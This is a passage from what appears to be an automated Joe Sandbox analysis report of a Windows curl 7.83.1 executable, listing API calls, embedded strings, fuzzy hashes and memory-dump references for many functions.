                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: freemalloc
                                • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
                                • API String ID: 3061335427-1157147699
                                • Opcode ID: a3bd4c5e926383adbc89605f71d54672c64bda03ae85339de2886c0687a3c817
                                • Instruction ID: 6ea953aa3b7f030b1fd4f5015fd4e2f6c4a0179392f149fa869f4cc6ab62f634
                                • Opcode Fuzzy Hash: a3bd4c5e926383adbc89605f71d54672c64bda03ae85339de2886c0687a3c817
                                • Instruction Fuzzy Hash: F7212832B08609ABEB25ABAC985CB6D7BF5FB45360F34403AD441D7380DA70DD40C7A4
                                APIs
                                • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 0086D370
                                • ___from_strstr_to_strchr.LIBCMT ref: 0086D386
                                • ___from_strstr_to_strchr.LIBCMT ref: 0086D39C
                                • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 0086D3DF
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrfgets
                                • String ID:
                                • API String ID: 4248516992-0
                                • Opcode ID: b33b51bff5ec09ae93258a9f02510c6bc784634d474c9082e5f43ca223ddc8f5
                                • Instruction ID: e8daa623428d16dc954f93819f4fee40618e1289cf8ee65fb38cdc2c3e424db0
                                • Opcode Fuzzy Hash: b33b51bff5ec09ae93258a9f02510c6bc784634d474c9082e5f43ca223ddc8f5
                                • Instruction Fuzzy Hash: 10210075E0431D9ADB24CF28DD41BDAB3A8FF15340F0000A9E585EB381EAB09EC48BA1
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086661C
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00866636
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00866651
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0086666B
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree
                                • String ID:
                                • API String ID: 1865132094-0
                                • Opcode ID: 403f6242b9a5e7b06645d7de02d7dcd80d13ccb5da3b50490b90e79ba4a88aba
                                • Instruction ID: 95f0ac2cdca51e616fd938be12a49867141ba7b1725d37bebfd4d248c0b7fd36
                                • Opcode Fuzzy Hash: 403f6242b9a5e7b06645d7de02d7dcd80d13ccb5da3b50490b90e79ba4a88aba
                                • Instruction Fuzzy Hash: E22162B45087C2DEC7218F3994897A6BBE4FB56318F1A4F0EE49ADB240DB31D902CB41
                                APIs
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,00870FFB,?,00000000,754B43D0,?,00871589,?,?,?,?,00000000), ref: 00870EE5
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I64,00000003,?,?,?,?,?,?,?,?,?,00000000), ref: 00870EFA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: strncmp
                                • String ID: I32$I64
                                • API String ID: 1114863663-3980630743
                                • Opcode ID: c873f61adbde51e63062e0d956f81f6d19e7357f72e5b9183edde7d79ccf9663
                                • Instruction ID: fe823300cda5ace7c1e45ed6990916abeee0a99a8ce78de1ff8cc05d6812e461
                                • Opcode Fuzzy Hash: c873f61adbde51e63062e0d956f81f6d19e7357f72e5b9183edde7d79ccf9663
                                • Instruction Fuzzy Hash: 2B11F0BA840543C09A39493C6AED6AB1A46F707360B188682FC0CECAEDCC41CE858C43
                                APIs
                                • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,008724A8), ref: 00894820
                                • __alldvrm.LIBCMT ref: 00894839
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00894863
                                • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,008724A8,00000000), ref: 00894873
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1296068966-0
                                • Opcode ID: 95285e4e8bfc1a6c872d59c6886a1e0469ea0979cba3a755b1a5d22864d65eab
                                • Instruction ID: d527ea5fc59b87288c6672e7af83b271988c72955186885c36d9f29d4c5994e3
                                • Opcode Fuzzy Hash: 95285e4e8bfc1a6c872d59c6886a1e0469ea0979cba3a755b1a5d22864d65eab
                                • Instruction Fuzzy Hash: 42018471A04204BFEB059FA8DC81F9EBBBEFB48308F108179B609D6261D7329A51CB40
                                APIs
                                • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,008610B6), ref: 0087028E
                                • __alldvrm.LIBCMT ref: 008702A7
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008702D1
                                • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,008610B6), ref: 008702DA
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1296068966-0
                                • Opcode ID: 3ec9b75da4440ec8c794cfda3ad246696209088223adf5610cbdc29f9d61a809
                                • Instruction ID: d2ce2b8b9ef533969a177491cb5cc9bf0ec5652328ee1d6a2cbb97458bf24930
                                • Opcode Fuzzy Hash: 3ec9b75da4440ec8c794cfda3ad246696209088223adf5610cbdc29f9d61a809
                                • Instruction Fuzzy Hash: 7CF0A472A05118BFE70557A8EC45F9ABBBFFB4C344F108135B208E6262D6B15E405750
                                APIs
                                • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00868BF9,00888B58,?,00881E86,?,?,00000000), ref: 00888889
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00881E86,?,?,00000000), ref: 0088889F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00881E86,?,?,00000000), ref: 008888B3
                                • closesocket.WS2_32(000000FF), ref: 008888CB
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$CriticalDeleteSectionclosesocket
                                • String ID:
                                • API String ID: 3086658127-0
                                • Opcode ID: 75fd441cf2e4c92f595c9be5fc37c6bbbf1e3fd09a663b24df4af0f5c2e1db76
                                • Instruction ID: 37be2e52e8978302a204483065d2d27c075ab72dca3436f706bedc6b909b5ad2
                                • Opcode Fuzzy Hash: 75fd441cf2e4c92f595c9be5fc37c6bbbf1e3fd09a663b24df4af0f5c2e1db76
                                • Instruction Fuzzy Hash: 61F06D36200912EBDB193B14EC08B1CBB72FF48721F58823AE601D26F1DF711862CB91
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00886067
                                  • Part of subcall function 0088E9BE: inet_pton.WS2_32(00000002,?,?), ref: 0088E9D8
                                  • Part of subcall function 0088E9BE: inet_pton.WS2_32(00000017,?,?), ref: 0088E9E9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: inet_pton$_time64
                                • String ID: includesubdomains$max-age=
                                • API String ID: 868955570-1235841791
                                • Opcode ID: 72550818301e6ac1f937ca874d4f1bb208e3303aa58af5caf07b566886f8b7db
                                • Instruction ID: c4fc0973d71ad5f616953deb415ec9fea41f1d274021930d42fa97f5bc0cce06
                                • Opcode Fuzzy Hash: 72550818301e6ac1f937ca874d4f1bb208e3303aa58af5caf07b566886f8b7db
                                • Instruction Fuzzy Hash: AD512A35F402658BDB24BA7888253FEB7E6FF66350F285119D8D1EB383FA609C148791
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000003,00000000,00000005), ref: 00889B94
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno
                                • String ID: %lx$0Lu@Ru@/Mu
                                • API String ID: 2918714741-898363541
                                • Opcode ID: 81dc1da413aa858e24fef3cf2b29a765cf63b3e6611e3e178be18fb4329739d8
                                • Instruction ID: 87d3ac630a0ebe48fc3cf40853e93a9e26b3916d7d90e1ea651c3d99aacda653
                                • Opcode Fuzzy Hash: 81dc1da413aa858e24fef3cf2b29a765cf63b3e6611e3e178be18fb4329739d8
                                • Instruction Fuzzy Hash: CD51D732A006A98BCF28AEBC98C01BD77E5FF85334F294639D4E6D7681E6719C46C741
                                Strings
                                • SSL/TLS connection timeout, xrefs: 008A57CB
                                • select/poll on SSL/TLS socket, errno: %d, xrefs: 008A57B9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                • API String ID: 0-3791222319
                                • Opcode ID: 7051c32b9693b4db2bc82dfb8bea39e5690619948c2bd24ff5cbc918a4cda9a4
                                • Instruction ID: 686f85a036346dd67c6347f105eff4491a12ec531d1e3d2ca770086eedd620be
                                • Opcode Fuzzy Hash: 7051c32b9693b4db2bc82dfb8bea39e5690619948c2bd24ff5cbc918a4cda9a4
                                • Instruction Fuzzy Hash: 64512635200B06DBFB25DE288891A7B77E1FF97324F60491DF98AC2A95DB30D8C48B41
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008700A4
                                  • Part of subcall function 008720F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00868A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00872101
                                Strings
                                • internal error: invalid pattern type (%d), xrefs: 00870034
                                • %0*lu, xrefs: 00870014
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_func_strdup
                                • String ID: %0*lu$internal error: invalid pattern type (%d)
                                • API String ID: 2404189530-449433499
                                • Opcode ID: ec0293965d27c3639b1ebd21cbb1db6692e160674a95be702a9cfdd39dc4f40a
                                • Instruction ID: e40a5b9793a27cb2582ff1a855a9ac95670804360a2fcc837118d73377850156
                                • Opcode Fuzzy Hash: ec0293965d27c3639b1ebd21cbb1db6692e160674a95be702a9cfdd39dc4f40a
                                • Instruction Fuzzy Hash: 1C51BE30604606DFCB19CF6CD454BA9BBA1FF46318F28C0A9D59ACA247DA72D942DF21
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 0089C351
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr
                                • String ID: Content-Length: %I64d$The file does not exist
                                • API String ID: 601868998-3816122970
                                • Opcode ID: 17aeb6ea418f1d3034f8e6f7cacd2e99e18f84ab3ed657019305d8792357a8ad
                                • Instruction ID: c6775572945a5160df2d0a909373e2d98a5308f58a14664165cbc1b992aa84b9
                                • Opcode Fuzzy Hash: 17aeb6ea418f1d3034f8e6f7cacd2e99e18f84ab3ed657019305d8792357a8ad
                                • Instruction Fuzzy Hash: F33129617047009AFA24BA2D9C91A3FB3D9FFD1724F28851BF459C62C2EA72DC0056A7
                                APIs
                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,0089A3DE,?), ref: 0089A6FF
                                Strings
                                • FTP response aborted due to select/poll error: %d, xrefs: 0089A706
                                • FTP response timeout, xrefs: 0089A720
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout
                                • API String ID: 1452528299-4057338436
                                • Opcode ID: 45a791f8dcfceb8c03ad72a01c68ef4c80f892582a1b8182dc7e2e535c226c2d
                                • Instruction ID: 81fab24df3e8266c5a8c41f03496dae3d3d10b4a5f5d1af09519b04cbf0e5a0e
                                • Opcode Fuzzy Hash: 45a791f8dcfceb8c03ad72a01c68ef4c80f892582a1b8182dc7e2e535c226c2d
                                • Instruction Fuzzy Hash: D7418675A0060A9FDF0DAB99C8516AE77B5FFE5314F2C8169D815E7280E7308E028BD2
                                APIs
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 008704E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: "%s":$"%s":null
                                • API String ID: 1795875747-2759546026
                                • Opcode ID: 1feeeb94e30ae13806192d1fbacd494673b6227c62abffa8e7394824ebe57427
                                • Instruction ID: 066817b6bb52a35b74421043b9ac139601a4e3621c636c5f1fc26000395a69bc
                                • Opcode Fuzzy Hash: 1feeeb94e30ae13806192d1fbacd494673b6227c62abffa8e7394824ebe57427
                                • Instruction Fuzzy Hash: FF3197B0A00209EFDF20CF54C945A6AB7A5FF41308F14C019EA0DD7619E234EE80DF9A
                                APIs
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(008B6C88,00000000,00000000,?,?,00000000,?,008707A5,?,?), ref: 0087096B
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(008C07BC,00000000), ref: 008709AF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: "curl_version":
                                • API String ID: 1795875747-1127485152
                                • Opcode ID: 963026bd82266cc270a38386e4ca905244e32ff669cc52c2c4a133b2a4770a70
                                • Instruction ID: c72cf27c9848d729103529003361d5a44f92ff9ccd23830c732d67b1ac2d6579
                                • Opcode Fuzzy Hash: 963026bd82266cc270a38386e4ca905244e32ff669cc52c2c4a133b2a4770a70
                                • Instruction Fuzzy Hash: FA010832304310AEF6085755AC46BBA7BD8FF85764F50412DF609C52D2EEFAE8108A65
                                APIs
                                • htons.WS2_32(?), ref: 0087E43C
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,0087EED8,?,?,?), ref: 0087E45F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errnohtons
                                • String ID: 0Lu@Ru@/Mu
                                • API String ID: 2581741894-1923536700
                                • Opcode ID: 665b150ecad8fb51f220e3709b7c554ffa0dc983044ad95e177ae730e765cba3
                                • Instruction ID: cf84de7823db8a25ac4e543d47e5f3d7fb0bae3d1b0122198059db87c8ef955e
                                • Opcode Fuzzy Hash: 665b150ecad8fb51f220e3709b7c554ffa0dc983044ad95e177ae730e765cba3
                                • Instruction Fuzzy Hash: 1A11C13A140B08AFE7209F18D805B6637E4FB0A711F00C085F98DDF299D6B4E8409765
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867E0E
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00867E20
                                Strings
                                • -v, --verbose overrides an earlier trace/verbose option, xrefs: 00867E3D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree
                                • String ID: -v, --verbose overrides an earlier trace/verbose option
                                • API String ID: 1865132094-440421925
                                • Opcode ID: 3d206728407ea816e243834eeed3cda934b3bd8355c88bc0a77d4854dacc0abc
                                • Instruction ID: 6c8d8756c83b5e294c360d47365450bb251a3f860abc2da52d63e82db2ea6dea
                                • Opcode Fuzzy Hash: 3d206728407ea816e243834eeed3cda934b3bd8355c88bc0a77d4854dacc0abc
                                • Instruction Fuzzy Hash: 9E11E37020C782DFC711CF348855666BBE0FB46718F190F5AE099C7280DB359885CBC2
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,?), ref: 00889A46
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno
                                • String ID: %d.%d.%d.%d$0Lu@Ru@/Mu
                                • API String ID: 2918714741-594881072
                                • Opcode ID: 54d4a5e4be74ea23d97ade3f0c2c25c1610bfe6698ac0c4b39c946f42ca7eb91
                                • Instruction ID: 9e7616090727d569ca3a94a1f6c1e9a65dd102663dce914ea0d1dfe1eaf70338
                                • Opcode Fuzzy Hash: 54d4a5e4be74ea23d97ade3f0c2c25c1610bfe6698ac0c4b39c946f42ca7eb91
                                • Instruction Fuzzy Hash: 401144305002999ECB19EF7C8811AFABFF9FF4A304F5C4198E4C5D7242D2369906CBA0
                                APIs
                                • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0087EE2C
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0087EE4B
                                  • Part of subcall function 00870B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00870B6D
                                  • Part of subcall function 00870B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00870B74
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcgetsockoptsetsockopt
                                • String ID: @
                                • API String ID: 1224256098-2726393805
                                • Opcode ID: c6c2555d6a16be95092e7f0fa775ed2451055ad3120bfda8b05813e25b939498
                                • Instruction ID: 839e11c541116d598af2b79aaecafca0d8e1c7f626a63bb93c0f4a428c89c0b6
                                • Opcode Fuzzy Hash: c6c2555d6a16be95092e7f0fa775ed2451055ad3120bfda8b05813e25b939498
                                • Instruction Fuzzy Hash: A70140B2900609BAE720DB54DC89FAE77ADFB08705F1044A5E605E6285D7B0DA498B51
                                APIs
                                • gethostname.WS2_32(?,00000401), ref: 00897300
                                • ___from_strstr_to_strchr.LIBCMT ref: 00897316
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
